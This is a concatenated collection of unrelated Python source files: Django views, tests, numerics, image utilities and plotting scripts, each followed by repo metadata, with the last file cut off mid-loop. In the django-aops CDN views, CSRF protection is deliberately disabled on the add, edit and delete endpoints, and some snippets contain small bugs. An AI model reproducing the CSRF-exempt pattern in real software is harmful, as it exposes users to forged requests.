component_config={FEATURIZERS: ["cvf_word", "LexicalSyntacticFeaturizer"]}
)
model_data = classifier.preprocess_train_data(training_data)
assert len(model_data.get(TEXT).get(SENTENCE)) == 1
assert len(model_data.get(TEXT).get(SEQUENCE)) == 1
assert len(model_data.get(LABEL).get(SEQUENCE)) == 1
assert model_data.get(LABEL).get(SENTENCE) is None
assert model_data.get(TEXT).get(SEQUENCE)[0][0].shape == (5, sequence_feature_dim)
assert model_data.get(TEXT).get(SENTENCE)[0][0].shape == (1, sentence_feature_dim)
assert model_data.get(LABEL).get(SEQUENCE)[0][0].shape == (1, 1)
| 5,783 |
demo/code/2016-1-20/mytimezone/foo/views.py
|
uxlsl/uxlsl.github.io
| 0 |
2172136
|
import pytz
from django.shortcuts import redirect, render
from django.utils import timezone
class TimezoneMiddleware(object):
def process_request(self, request):
tzname = request.session.get('django_timezone')
if tzname:
timezone.activate(pytz.timezone(tzname))
else:
timezone.deactivate()
def set_timezone(request):
if request.method == 'POST':
request.session['django_timezone'] = request.POST['timezone']
return redirect('/set_timezone')
else:
return render(request, 'template.html',
{'timezones': pytz.common_timezones,
'value': timezone.now(),
})
| 709 |
aops/cmdb/views/cdn.py
|
spunkmars/django-aops
| 26 |
2172548
|
#coding=utf-8
from django.shortcuts import render_to_response, get_object_or_404
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from django.core.paginator import Paginator, InvalidPage, EmptyPage, PageNotAnInteger
from django.db.models import Q
from django.core.urlresolvers import reverse
from django import forms
from django.forms import ModelForm
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.csrf import csrf_exempt
from libs.views.common import list_data, del_model_items, display_confirm_msg
from cmdb.forms.cdn import CdnForm
from cmdb.models.common import get_model_all_field_objects, get_model_relate_field, get_model_valid_fields
from cmdb.models.cdn import Cdn
import json
from libs.models.common import del_model_data
def app_info():
app = {
"name" : "cmdb",
"fun" : "cdn",
"edit_url" : "cmdb:edit_cdn",
"del_url" : "cmdb:del_cdn"
}
return app
@csrf_exempt #禁用csrf
def add_cdn(request):
if request.method == 'POST':
form = CdnForm(model=Cdn, data=request.POST)
if form.is_valid():
new_cdn = form.save()
return HttpResponseRedirect(reverse('cmdb:list_cdn'))
else:
form = CdnForm(model=Cdn
)
app = app_info()
app['location'] = 'add'
m2m_fs = Cdn._meta.many_to_many
m2m_list=[]
for m2m_f in m2m_fs:
if m2m_f.name in form.fields.keys():
m2m_list.append(m2m_f.name)
return render_to_response('add_data.html',
{ 'form': form, 'app':app, 'm2m_list':m2m_list} ,context_instance=RequestContext(request))
@csrf_exempt #禁用csrf
def edit_cdn(request, cdn_id):
cdn = get_object_or_404(Cdn, pk=cdn_id)
if request.method == 'POST':
form = CdnForm(model=Cdn, instance=cdn, data=request.POST)
if form.is_valid():
new_cdn = form.save()
return HttpResponseRedirect(reverse('cmdb:list_cdn'))
else:
form = CdnForm(model=Cdn, instance=cdn)
app = app_info()
app['location'] = 'edit'
m2m_fs = Cdn._meta.many_to_many
m2m_list=[]
for m2m_f in m2m_fs:
if m2m_f.name in form.fields.keys():
m2m_list.append(m2m_f.name)
return render_to_response('edit_data.html',
{ 'form': form, 'app':app, 'm2m_list':m2m_list} ,context_instance=RequestContext(request))
@csrf_exempt #禁用csrf
def list_cdn(request):
model_object = Cdn
template_file = 'list_data.html'
#show_field_list = get_model_all_field_objects(model=model_object)
show_field_list = ['id', 'company', 'status', 'comment']
filter_field = 'supplier'
each_page_items = 10
custom_get_parameter = {}
app = app_info()
app['location'] = 'list'
render_context = list_data(app=app, request=request, model_object=model_object, each_page_items = each_page_items, filter_field = filter_field, template_file = template_file, show_field_list = show_field_list)
return render_context
@csrf_exempt #禁用csrf
def del_cdn(request, cdn_id):
del_res = {}
if request.method == "POST":
del_res = del_model_data(model=Cdn, id=cdn_id)
html=json.dumps(del_res)
return HttpResponse(html, content_type="text/HTML")
| 3,380 |
day8.py
|
mmertama/advent-of-code-2021
| 0 |
2172820
|
example = '''be cfbegad cbdgef fgaecd cgeb fdcge agebfd fecdb fabcd edb | fdgacbe cefdb cefbgd gcbe
edbfga begcd cbg gc gcadebf fbgde acbgfd abcde gfcbed gfec | fcgedb cgb dgebacf gc
fgaebd cg bdaec gdafb agbcfd gdcbef bgcad gfac gcb cdgabef | cg cg fdcagb cbg
fbegcd cbd adcefb dageb afcb bc aefdc ecdab fgdeca fcdbega | efabcd cedba gadfec cb
aecbfdg fbg gf bafeg dbefa fcge gcbea fcaegb dgceab fcbdga | gecf egdcabf bgf bfgea
fgeab ca afcebg bdacfeg cfaedg gcfdb baec bfadeg bafgc acf | gebdcfa ecba ca fadegcb
dbcfg fgd bdegcaf fgec aegbdf ecdfab fbedc dacgb gdcebf gf | cefg dcbef fcge gbcadfe
bdfegc cbegaf gecbf dfcage bdacg ed bedf ced adcbefg gebcd | ed bcgafe cdgba cbgef
egadfb cdbfeg cegd fecab cgb gbdefca cg fgcdab egfdb bfceg | gbdfcae bgc cg cgb
gcafb gcf dcaebfg ecagb gf abcdeg gaef cafbge fdbac fegbdc | fgae cfgab fg bagce'''
def parse_digits(data):
signals = []
for ln in data:
sep = ln.find('|')
signals.append((ln[:sep].split(), ln[sep + 1:].split()))
return signals
def count_easy_digits(data):
signals = parse_digits(data)
counts = {x: 0 for x in range(0, 8)}
for s in signals:
output = s[1]
for o in output:
counts[len(o)] += 1
segments = [6, 2, 5, 5, 4, 5, 6, 3, 7, 6] # 0 1 2 3 4 5 6 7 8 9
print("easy digits", counts[segments[1]] + counts[segments[4]] + counts[segments[7]] + counts[segments[8]])
def digit_output(data):
values = parse_digits(data)
total = 0
for v in values:
digits = [None for _ in range(10)]
digits[8] = set(list('abcdef'))
signals = v[0]
for s in signals:
sig_set = set(list(s))
if len(s) == 2:
digits[1] = sig_set
if len(s) == 3:
digits[7] = sig_set
if len(s) == 4:
digits[4] = sig_set
if len(s) == 7:
digits[8] = sig_set
while not all(digits):
for s in signals:
sig_set = set(list(s))
if len(s) == 6:
if digits[1] and not sig_set.issuperset(digits[1]):
digits[6] = sig_set
if digits[7] and not sig_set.issuperset(digits[7]):
digits[6] = sig_set
if digits[4] and sig_set.issuperset(digits[4]):
digits[9] = sig_set
if len(s) == 5:
if digits[1] and sig_set.issuperset(digits[1]):
digits[3] = sig_set
if digits[7] and sig_set.issuperset(digits[7]):
digits[3] = sig_set
if digits[6] and sig_set.issubset(digits[6]):
digits[5] = sig_set
if digits[9] and not sig_set.issubset(digits[9]):
digits[2] = sig_set
if len(s) == 6:
if digits[0] and sig_set != digits[0] and digits[6] and sig_set != digits[6]:
digits[9] = sig_set
if digits[9] and sig_set != digits[9] and digits[6] and sig_set != digits[6]:
digits[0] = sig_set
if digits[0] and sig_set != digits[0] and digits[9] and sig_set != digits[9]:
digits[6] = sig_set
if len(s) == 5:
if digits[2] and sig_set != digits[2] and digits[3] and sig_set != digits[3]:
digits[5] = sig_set
if digits[5] and sig_set != digits[5] and digits[3] and sig_set != digits[3]:
digits[2] = sig_set
if digits[2] and sig_set != digits[2] and digits[5] and sig_set != digits[5]:
digits[3] = sig_set
'''
segments = [None for _ in range(8)]
segments[5] = digits[2].intersection(digits[1])
segments[4] = digits[8] - digits[9]
segments[3] = digits[8] - digits[0]
segments[2] = digits[8] - digits[6]
segments[1] = digits[3] - digits[5]
segments[6] = digits[1] - segments[2]
segments[7] = digits[3] - digits[7] - segments[3]
segments[0] = digits[7] - segments[2] - segments[6]
'''
value = 0
p = 1
outputs = v[1]
for o in reversed(outputs):
out_set = set(list(o))
for d in range(len(digits)):
if out_set == digits[d]:
value += d * p
p *= 10
total += value
# print(segments)
# print(value)
print("sum of digits is", total)
| 4,648 |
sql4json/data_query_engine.py
|
bheni/sql4json
| 7 |
2172669
|
from exceptions import *
from sql_statement import SQLStatement
from where_clause_evaluation_engine import *
from boolean_expressions.tree import BooleanExpressionTree
class DataQueryEngine(object):
where_evaluation_engine = WhereClauseEvaluationEngine()
def __init__(self, data, sql_str):
self.data = data
self.sql_statement = SQLStatement(sql_str)
self.results = None
self.from_roots = None
self.where_tree = None
self.init_from_roots()
self.init_where_boolean_tree()
self.query()
self.sort()
self.apply_limit()
def init_from_roots(self):
from_section = self.sql_statement.get_from_section()
if from_section is not None and len(from_section) > 0:
exists, self.from_roots = get_elements_by_path(self.data, from_section)
if not exists or len(self.from_roots) == 0:
raise FromClauseException("Could not find path %s." % from_section)
else:
self.from_roots = [self.data]
def init_where_boolean_tree(self):
self.where_tree = None
where_section = self.sql_statement.get_where_section()
if where_section is not None and len(where_section) > 0:
tokenizer = Tokenizer(where_section)
where_tokens = list(tokenizer)
if where_tokens is not None and len(where_tokens) > 0:
self.where_tree = BooleanExpressionTree(where_tokens, DataQueryEngine.where_evaluation_engine)
def query(self):
select_section = self.sql_statement.get_select_section()
select_items = split_on_any(select_section, frozenset((',', ' ', '\t', '\n', '\r')))
self.results = []
for root in self.from_roots:
if isinstance(root, tuple) or isinstance(root, list):
for node in root:
result_data = self.query_node(node, select_items)
if result_data is not None:
self.results.append(result_data)
elif isinstance(root, dict):
results = self.query_node(root, select_items)
if results is not None:
self.results.append(results)
def query_node(self, node, select_items):
if self.matches_where(node):
node_data = {}
for item in select_items:
if item.endswith('/'):
item += '*'
selecet_path_elements = split_on_any(item, frozenset(('/', '\\', '.')))
select_data = self.find_selected_items(node, selecet_path_elements)
if select_data is not None:
node_data.update(select_data)
return node_data
else:
return None
def find_selected_items(self, node, select_path_elements):
matching_data = {}
current = node
destination = matching_data
parent_dest = matching_data
current_key = None
element = None
num_elements = len(select_path_elements)
for i, element in enumerate(select_path_elements):
if i < num_elements - 1:
if element not in current:
return None
elif element not in destination:
destination[element] = {}
current_key = element
current = current[element]
parent_dest = destination
destination = destination[element]
else:
if element == '*':
if current_key is not None:
parent_dest[current_key] = current
else:
matching_data = current
if element == '__key__':
parent_dest['__key__'] = current.keys()
else:
if element in current:
destination[element] = current[element]
else:
destination[element] = None
return matching_data
def matches_where(self, node):
if self.where_tree is None:
return True
else:
return self.where_tree.evaluate(node)
def sort(self):
pass
def apply_limit(self):
limit = self.sql_statement.get_limit_section()
if limit is not None:
if len(limit) != 1 or not limit[0].isdigit():
raise LimitClauseException('"%s" is not a valid limit' % ' '.join(limit))
else:
limit = int(limit)
while len(self.results) > limit:
self.results.pop()
def get_results(self):
return self.results
def get_sql_statement(self):
return self.sql_statement
| 4,813 |
array_calc.py
|
chapman-phys220-2017f/cw-07-quinn-and-dain-and-andrew-cw-06
| 0 |
2170953
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
def derivative(a,b,n):
"""derivative(a,b,n)
Function to create the derivative matrix. Takes 3 inputs:
- a = float, starting point of the domain
- b = float, end point of domain
- n = number of points created in the domain
Output: an 'n x n' 2-dimensional numpy array that, when matrix multiplied by a 1-D array,
returns the approximate derivative at each point."""
t = np.linspace(a,b,n)
dx = t[1]-t[0]
empty = np.zeros(n, dtype = 'float64')
a,b = np.meshgrid(empty, empty)
A = a + b
#Forward Difference
A[0,0] = -1/dx
A[0,1] = 1/dx
#Symmetric Difference
index = np.arange(1,n-1)
A[index, index-1] = -1/(2*dx)
A[index, index+1] = 1/(2*dx)
#Backward Difference
A[n-1,n-2] = -1/dx
A[n-1,n-1] = 1/dx
return A
def second_derivative(a,b,n):
"""second_derivative(a,b,n)
Function to create the second derivative matrix. Takes 3 inputs:
- a = float, starting point of the domain
- b = float, end point of domain
- n = number of points created in the domain
Output: an 'n x n' 2-dimensional numpy array that, when matrix multiplied by a 1-D array,
returns the approximate second derivative at each point."""
t = np.linspace(a,b,n)
dx = t[1]-t[0]
empty = np.zeros(n, dtype = 'float64')
a,b = np.meshgrid(empty, empty)
A = a + b
#Forward Difference
A[0,0] = 1
A[0,1] = -2
A[0,2] = 1
#Symmetric/Forward Difference
A[1,0] = 2
A[1,1] = -3
A[1,3] = 1
#Symmetric Difference
index = np.arange(2,n-2)
A[index, index-2] = 1/2
A[index, index] = -1
A[index, index+2] = 1/2
#Symmetric/Backward Difference
A[n-2,n-4] = 1
A[n-2,n-2] = -3
A[n-2,n-1] = 2
#Backward Difference
A[n-1,n-3] = 1
A[n-1,n-2] = -2
A[n-1,n-1] = 1
return A*(1/(2*dx**2))
def f(a,b,n):
"""Returns an array of the square of the input (a float)"""
t = np.linspace(a,b,n)
return t**2
def s(a,b,n):
"""Returns an array of the sine of the input (float)"""
t = np.linspace(a,b,n)
sin = np.vectorize(np.sin)
sin = sin(t)
return sin
def g(a,b,n):
"""Returns an array of the gaussian function"""
def gauss(x):
"""Returns the Gaussian function dependent on the input float"""
c = 1/(np.sqrt(2*np.pi))
gauss = c*np.exp(-x**2/2)
return gauss
t = np.linspace(a,b,n)
gs = np.vectorize(gauss)
gs = gs(t)
return gs
def plot_function(a,b,n,f,string):
"""plot_function(a,b,n,f,string)"""
t = np.linspace(a,b,n)
deriv = np.dot(derivative(a,b,n),f)
sec_deriv = np.dot(second_derivative(a,b,n),f)
plt.plot(t,f,'b', label=string)
plt.plot(t,deriv,'r', label='Derivative')
plt.plot(t,sec_deriv,'g', label='Second Derivative')
plt.title(string)
plt.legend()
plt.show()
| 2,979 |
scripts/script_template.py
|
EricRa/py-win-admin
| 0 |
2171747
|
# DESCRIPTION:
# [description]
#
#
# USAGE:
# [Usage instructions]
#
# DEPENDENCIES:
# Python 3.5+
# Powershell 5.0+
# [Additional dependencies here]
# [code goes here]
#
#
#
#
#
#
#
#
# NOTES, TROUBLESHOOTING, AND OTHER INFO
#
| 240 |
milk/forms.py
|
NCC-AI/milk
| 0 |
2172848
|
from django import forms
from .models import Progress
class DirectoryPathForm(forms.ModelForm):
class Meta:
model = Progress
fields = ("target", )
class ImageUploadForm(forms.Form):
file = forms.ImageField(label='画像ファイル')
| 250 |
api/views.py
|
eee-alie/django-test
| 0 |
2172655
|
from rest_framework import viewsets
from .serilizers import Articleserializers
from .models import ArticleModels
class ArticleView(viewsets.ModelViewSet) :
queryset = ArticleModels.objects.all()
serializer_class = Articleserializers
lookup_field = "slug"
| 267 |
src/accounts/urls.py
|
samrika25/TRAVIS_HEROKU_GIT
| 0 |
2171389
|
from django.contrib import admin
from django.urls import path
from .Views import (RegisterView, LoginView, LogoutView, ChangePasswordView, ResetPasswordView)
app_name = "accounts"
urlpatterns = [
path('register/',RegisterView.as_view(), name="register"),
path('login/',LoginView.as_view(), name="login"),
path('logout/', LogoutView.as_view(), name="logout"),
path('reset/', ResetPasswordView.as_view(), name="reset"),
path('forgot/', ChangePasswordView.as_view(), name="forgot")
]
| 502 |
tests/operators/test_db.py
|
storiesbi/airflow_plugins
| 15 |
2172697
|
import os
import pytest
from airflow_plugins.operators import CreateTableWithColumns
@pytest.mark.parametrize(
['file_name', 'known_columns'],
[('test_db_columns.csv', [
"date", "bookings_count", "sectors_count", "passengers_count",
"seats_count", "bags_count", "booked_at", "partner", "market",
"airlines", "currency", "nationality", "device_type", "trip_type",
"src_dst", "src", "dst", "transfers", "booking_channel", '"AT_sales"',
"insurance_costs", "has_kiwi_interlining", "extras_sales", "refunds",
'"AT_costs"', "turnover", "margin", '"intra space"'
])]
)
def test_create_table_with_columns(file_name, known_columns):
file = os.path.join(os.path.dirname(os.path.realpath(__file__)), file_name)
get_columns = CreateTableWithColumns._get_table_columns
columns = get_columns(file)
assert len(known_columns) == len(columns)
for i in range(len(known_columns)):
assert known_columns[i] == columns[i]
| 992 |
stock/marketdata/interface.py
|
shenzhongqiang/cnstock_py
| 2 |
2171666
|
import redis
import os.path
import datetime
from stock.marketdata.bar import Bar
from stock.utils.symbol_util import exsymbol_to_symbol
from abc import ABCMeta, abstractmethod
from stock.marketdata.utils import load_csv
from stock.marketdata.storefactory import get_store
from config import store_type
import pandas as pd
import tushare as ts
class NoHistoryBeforeDate(Exception):
pass
class TooFewBarsBeforeDate(Exception):
pass
class MarketData:
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self):
pass
@abstractmethod
def get_data(self, exsymbol):
pass
def get_history_by_date(self, exsymbol):
store = get_store(store_type)
df = store.get(exsymbol)
return df[df.date <= self.date]
| 770 |
frasco_images.py
|
frascoweb/frasco-images
| 0 |
2171799
|
from frasco import Feature, action, OptionMissingError, AttrDict, current_app
from PIL import Image
import os
class ImagesFeature(Feature):
name = "images"
defaults = {"search_dir": None,
"dest_dir": None,
"output_format": None}
def init_app(self, app):
default_dir = None
if "forms" in app.features:
default_dir = app.features.forms.options["upload_dir"]
else:
default_dir = app.static_folder
if not self.options["search_dir"]:
self.options["search_dir"] = default_dir
if not self.options["dest_dir"]:
self.options["dest_dir"] = default_dir
def get_path(self, filename):
if os.path.isabs(filename):
return filename
sdir = self.options["search_dir"]
if sdir:
f = os.path.join(sdir, filename)
if os.path.exists(f):
return f
return filename
def get_dest_filename(self, path, opts, default="{path}{prefix}{name}{suffix}{ext}", **kwargs):
dest = opts.get("dest", default)
dest_dir = opts.get("dest_dir", self.options["dest_dir"])
if "{" in dest:
filename, ext = os.path.splitext(path)
data = dict(path=os.path.dirname(filename), name=os.path.basename(filename),
filename=filename, ext=ext, prefix="", suffix="")
data.update(kwargs)
data.update(dict((k, opts[k]) for k in ("ext", "prefix", "suffix") if k in opts))
dest = dest.format(**data)
if not os.path.isabs(dest) and dest_dir:
return os.path.join(dest_dir, dest), dest
return dest, dest
def save_img(self, path, opts, img, **kwargs):
pathname, filename = self.get_dest_filename(path, opts, **kwargs)
img.save(pathname, opts.get("format", self.options["output_format"]))
return filename
def get_size(self, opts, lprefix="", sprefix="", ratio=None):
w = opts.get("%swidth" % lprefix, opts.get("%sw" % sprefix))
h = opts.get("%sheight" % lprefix, opts.get("%sh" % sprefix))
if ("%ssize" % lprefix) in opts:
w, h = map(int, opts["%ssize" % lprefix].split("x", 1))
if ((w is None or h is None) and not ratio) or (w is None and h is None):
raise OptionMissingError("Missing size options for image manipulation")
if w is None:
r = float(h) / float(ratio[1])
w = int(ratio[0] * r)
elif h is None:
r = float(w) / float(ratio[0])
h = int(ratio[1] * r)
return w, h
@action(default_option="path", as_="image")
def read_image(self, path):
img = Image(self.get_path(path))
return AttrDict(format=img.format, size=img.size, mode=img.mode)
@action("resize_image")
def resize(self, path, resample=Image.ANTIALIAS, **opts):
path = self.get_path(path)
img = Image.open(path)
keep_ratio = False
try:
size = self.get_size(opts)
except OptionMissingError:
size = self.get_size(opts, "max_", "m", ratio=img.size)
keep_ratio = True
if keep_ratio:
img.thumbnail(size, resample)
else:
img = img.resize(size, resample)
return self.save_img(path, opts, img, suffix="-%sx%s" % size)
@action("create_image_thumbnail", default_option="path")
def create_thumbnail(self, path, resample=Image.ANTIALIAS, **opts):
img = Image.open(self.get_path(path))
fixed_size = False
try:
size = self.get_size(opts)
fixed_size = True
except OptionMissingError:
size = self.get_size(opts, "max_", "m", ratio=img.size)
if fixed_size and size[0] < img.size[0] and size[1] < img.size[1]:
r = max(float(size[0]) / float(img.size[0]), float(size[1]) / float(img.size[1]))
isize = (int(img.size[0] * r), int(img.size[1] * r))
img = img.resize(isize, resample)
x = max((isize[0] - size[0]) / 2, 0)
y = max((isize[1] - size[1]) / 2, 0)
img = img.crop((x, y, size[0], size[1]))
else:
img.thumbnail(size, resample)
return self.save_img(path, opts, img, suffix="-thumb-%sx%s" % size)
@action("crop_image")
def crop(self, path, **opts):
box = opts.get("box")
if not box:
w = opts.get("width", opts.get("w"))
h = opts.get("height", opts.get("h"))
box = (opts.get("x", 0), opts.get("y", 0), w, h)
path = self.get_path(path)
img = Image.open(path)
img = img.crop(box)
return self.save_img(path, opts, img, suffix="-cropped")
@action("rotate_image")
def rotate(self, path, angle, resample=0, expand=0, **opts):
path = self.get_path(path)
img = Image(path)
img = img.rotate(float(angle), resample, expand)
return self.save_img(path, opts, img, suffix="-rotated")
@action("transpose_image")
def transpose(self, path, method, **opts):
mapping = {"flip_left_right": Image.FLIP_LEFT_RIGHT,
"flip_top_bottom": Image.FLIP_TOP_BOTTOM,
"rotate90": Image.ROTATE_90,
"rotate180": Image.ROTATE_180,
"rotate270": Image.ROTATE_270}
path = self.get_path(path)
img = Image.open(path)
img = img.transpose(mapping[method])
return self.save_img(path, opts, img, suffix="-" + method)
@action("add_image_watermark")
def add_watermark(self, path, watermark, **opts):
path = self.get_path(path)
img = Image.open(path)
wtmk = Image.open(watermark)
iw, ih = img.size
ww, wh = wtmk.size
pos = (opts.get("x", iw - ww), opts.get("y", ih - wh))
img.paste(wtmk, pos)
return self.save_img(path, opts, img, suffix="-watermark")
| 5,990 |
src/metric.py
|
HephaestusProject/pytorch-FCN
| 0 |
2173022
|
import torch.nn as nn
from sklearn.metrics import average_precision_score, roc_auc_score
def get_auc(y_score, y_true):
# for Validation sanity check:
if y_true.shape[0] == 1 or y_true.shape[0] == 2:
return 0, 0
else:
roc_aucs = roc_auc_score(
y_true.flatten(0, 1).detach().cpu().numpy(),
y_score.flatten(0, 1).detach().cpu().numpy(),
)
pr_aucs = average_precision_score(
y_true.flatten(0, 1).detach().cpu().numpy(),
y_score.flatten(0, 1).detach().cpu().numpy(),
)
return roc_aucs, pr_aucs
| 599 |
Util/postprocessing/urca-tools/slice-convgrad.py
|
sailoridy/MAESTRO
| 17 |
2172541
|
#!/usr/bin/env python
import yt
from yt import derived_field
import numpy as np
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('infile', type=str, help='Name of input plotfile.')
parser.add_argument('-adiabatic', '--adiabatic', action='store_true', help='If supplied, plot adiabatic excess.')
parser.add_argument('-ledoux', '--ledoux', action='store_true', help='If supplied, plot ledoux excess.')
parser.add_argument('-convtype', '--convtype', action='store_true', help='If supplied, plot convective type.')
parser.add_argument('-w', '--width', type=float,
help='Width of slice (cm). Default is domain width.')
parser.add_argument('-sign', '--sign', action='store_true', help='If supplied, plot only the sign of the excess.')
parser.add_argument('-fmin', '--field_min', type=float, help='Minimum scale for colorbar.')
parser.add_argument('-fmax', '--field_max', type=float, help='Maximum scale for colorbar.')
parser.add_argument('-log', '--logscale', action='store_true', help='If supplied, use a log scale for the field.')
parser.add_argument('-symlog', '--symlog', action='store_true', help='If supplied, use symlog scaling, which is linear near zero, to accomodate positive and negative values.')
parser.add_argument('-linthresh', '--linthresh', type=float, help='Linear threshold for symlog scaling. (Default is 0.1)')
parser.add_argument('-dc', '--drawcells', action='store_true', help='If supplied, draw the cell edges.')
parser.add_argument('-dg', '--drawgrids', action='store_true', help='If supplied, draw the grids.')
parser.add_argument('-octant', '--octant', action='store_true', help='Sets slice view appropriately for octant dataset.')
args = parser.parse_args()
@derived_field(name='adiabatic_excess')
def _adiabatic_excess(field, data):
return data[('boxlib','actual gradient')] - data[('boxlib','adiabatic gradient')]
@derived_field(name='ledoux_excess')
def _ledoux_excess(field, data):
return data[('boxlib','actual gradient')] - data[('boxlib','ledoux gradient')]
@derived_field(name='sign_adiabatic_excess')
def _sign_adiabatic_excess(field, data):
return np.sign(data[('boxlib','actual gradient')] - data[('boxlib','adiabatic gradient')])
@derived_field(name='sign_ledoux_excess')
def _sign_ledoux_excess(field, data):
return np.sign(data[('boxlib','actual gradient')] - data[('boxlib','ledoux gradient')])
# Convective type is defined as follows:
# 1.0 = Convectively unstable wrt Ledoux and Adiabatic
# 0.0 = Semiconvection, stable wrt Ledoux but unstable wrt Adiabatic or v.v.
# -1.0 = Convectively stable wrt Ledoux and Adiabatic
@derived_field(name='conv_type')
def _conv_type(field, data):
return 0.5*data['sign_ledoux_excess']+0.5*data['sign_adiabatic_excess']
def doit(field):
ds = yt.load(args.infile)
if not args.width:
width = max(ds.domain_width)
else:
width = yt.YTQuantity(args.width, 'cm')
maxv = ds.all_data().max(field)
minv = ds.all_data().min(field)
pos_maxv = np.ceil(np.log10(maxv))
neg_maxv = np.ceil(np.log10(minv))
logmaxv = max(pos_maxv, neg_maxv)
linminv = min(abs(maxv), abs(minv))
if args.octant:
dcenter = width.in_units('cm').v/2.0
cpos = ds.arr([dcenter, dcenter, dcenter], 'cm')
s = yt.SlicePlot(ds, 'x', field, center=cpos, width=width, origin="native")
else:
s = yt.SlicePlot(ds, 'x', field, center='c', width=width)
s.annotate_scale()
if args.drawcells:
s.annotate_cell_edges()
if args.drawgrids:
s.annotate_grids()
s.set_buff_size(2048)
if minv < 0.0 and maxv > 0.0:
s.set_cmap(field, 'PiYG')
linthresh = 0.1
if ((args.logscale or args.symlog) and
not args.sign and not field=='conv_type'):
if args.linthresh:
linthresh = args.linthresh
s.set_log(field, args.logscale, linthresh=linthresh)
else:
s.set_log(field, args.logscale)
if args.sign or field=='conv_type':
s.set_zlim(field, -1.0, 1.0)
plot = s.plots[field]
colorbar = plot.cb
s._setup_plots()
if field != 'conv_type':
colorbar.set_ticks([-1, 0, 1])
colorbar.set_ticklabels(['$-1$', '$0$', '$+1$'])
else:
colorbar.set_ticks([-0.8, 0, 0.65])
colorbar.ax.tick_params(axis=u'both', which=u'both',length=0)
colorbar.ax.set_yticklabels(['stable', 'semiconvective', 'convective'], rotation=90)
elif args.field_min and args.field_max:
s.set_zlim(field, args.field_min, args.field_max)
elif args.field_min and args.field_min < 0.0:
s.set_zlim(field, args.field_min, -args.field_min)
elif args.field_max and args.field_max > 0.0:
s.set_zlim(field, -args.field_max, args.field_max)
else:
s.set_zlim(field, -linthresh, linthresh)
else:
s.set_cmap(field, 'Greens')
s.save('{}.slice.{}.png'.format(args.infile, field))
if __name__=='__main__':
if args.convtype:
field = 'conv_type'
doit(field)
if args.adiabatic:
field = 'adiabatic_excess'
if args.sign:
field = 'sign_' + field
doit(field)
if args.ledoux:
field = 'ledoux_excess'
if args.sign:
field = 'sign_' + field
doit(field)
if not args.adiabatic and not args.ledoux and not args.convtype:
if args.sign:
doit('sign_adiabatic_excess')
doit('sign_ledoux_excess')
else:
doit('adiabatic_excess')
doit('ledoux_excess')
doit('conv_type')
| 5,756 |
tests/schema/test_report_drafts.py
|
openlobby/openlobby-server
| 7 |
2171122
|
import pytest
from openlobby.core.models import User
from ..dummy import prepare_reports
pytestmark = [pytest.mark.django_db, pytest.mark.usefixtures("django_es")]
def test_unauthenticated(call_api, snapshot):
prepare_reports()
query = """
query {
reportDrafts {
id
}
}
"""
response = call_api(query)
snapshot.assert_match(response)
def test_authenticated(call_api, snapshot):
prepare_reports()
query = """
query {
reportDrafts {
id
date
published
title
body
receivedBenefit
providedBenefit
ourParticipants
otherParticipants
isDraft
edited
}
}
"""
response = call_api(query, user=User.objects.get(username="wolf"))
snapshot.assert_match(response)
| 887 |
setup.py
|
anmarkoulis/clickup-to-jira
| 2 |
2172882
|
import setuptools
version = "1.0.1"
def get_requirements_from_file(requirements_file):
"""
Get requirements from file.
:param str req_file: Name of file to parse for requirements.
:return: List of requirements
:rtype: list(str)
"""
requirements = []
with open(requirements_file) as f:
for line in f:
line = line.strip()
if line and not line.startswith(("#", "-e")):
requirements.append(line)
return requirements
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="clickup-to-jira",
version=version,
author="<NAME>",
author_email="<EMAIL>",
description="A utility that helps migrating from Clickup to JIRA",
long_description=long_description,
long_description_content_type="text/markdown",
packages=setuptools.find_packages(exclude=["tests", "docs"]),
include_package_data=True,
classifiers=[
"Development Status :: 4 - Beta",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.8",
"Operating System :: OS Independent",
],
entry_points={
"console_scripts": [
"migrate_to_jira = clickup_to_jira.scripts.migrate:main"
],
},
python_requires=">=3.8",
zip_safe=True,
install_requires=get_requirements_from_file("requirements.txt"),
tests_require=get_requirements_from_file("requirements-tests.txt"),
)
| 1,536 |
V_3rd/KernelLib_MD_JIT_CUDA/NAG.py
|
KhalilWong/Kernel_MD
| 1 |
2173132
|
import numpy as np
import numba as nb
import matplotlib.pyplot as mpl
################################################################################
def NAG_Method(v,x,mu,lr,dx):
#
pre_v=v
v=mu*v
v+=-lr*dx
x+=v+mu*(v-pre_v)
#
return(v,x)
################################################################################
def Momentum_Method(v,x,mu,lr,dx):
#
v=mu*v
v+=-lr*dx
x+=v
#
return(v,x)
################################################################################
def Adam_Method(t,v,cache,x,mu,decay_rate,lr,dx):
#
eps=0.0
#eps=1e-8
v=mu*v+(1-mu)*dx
vt=v/(1-mu**t)
cache=decay_rate*cache+(1-decay_rate)*dx**2
cachet=cache/(1-decay_rate**t)
x+=-(lr/(np.sqrt(cachet)+eps))*vt
#
return(v,cache,x)
################################################################################
def GD_Method(x,lr,dx):
#
x+=-lr*dx
#
return(x)
################################################################################
def F(x):
#
y=np.cos(x)+2*np.cos(x/2)+3*np.cos(x/3)+5*np.cos(x/5)
#y=3*x**4-4*x**3-12*x**2+17
#y=np.sin(x)-np.cos(x)
#
return(y)
################################################################################
def Gradient(x,delta):
#
y1=F(x-delta)
y2=F(x+delta)
dx=(y2-y1)/(2*delta)
#
return(dx)
################################################################################
def Data():
#
mu=0.9995
decay_rate=0.9995
lr=1e-4
Alr=1e-3
ilr=1e-3
delta=1e-4
#
v=0.0
Mv=v
Av=v
cache=0.0
x=-36.0
Mx=x
Ax=x
xx=x
ix=x
lx=36
N=20000
#
NAG=np.zeros((N+1,3))
M=np.zeros((N+1,3))
Adam=np.zeros((N+1,3))
GD=np.zeros((N+1,3))
THE=np.zeros((2*N+1,2))
NAG[0,0]=x
NAG[0,1]=F(x)
NAG[0,2]=0
M[0,0]=Mx
M[0,1]=F(Mx)
M[0,2]=0
Adam[0,0]=Ax
Adam[0,1]=F(Ax)
Adam[0,2]=0
GD[0,0]=xx
GD[0,1]=F(xx)
GD[0,2]=0
THE[N,0]=ix
THE[N,1]=F(ix)
#
for i in range(N):
dx=Gradient(x,delta)
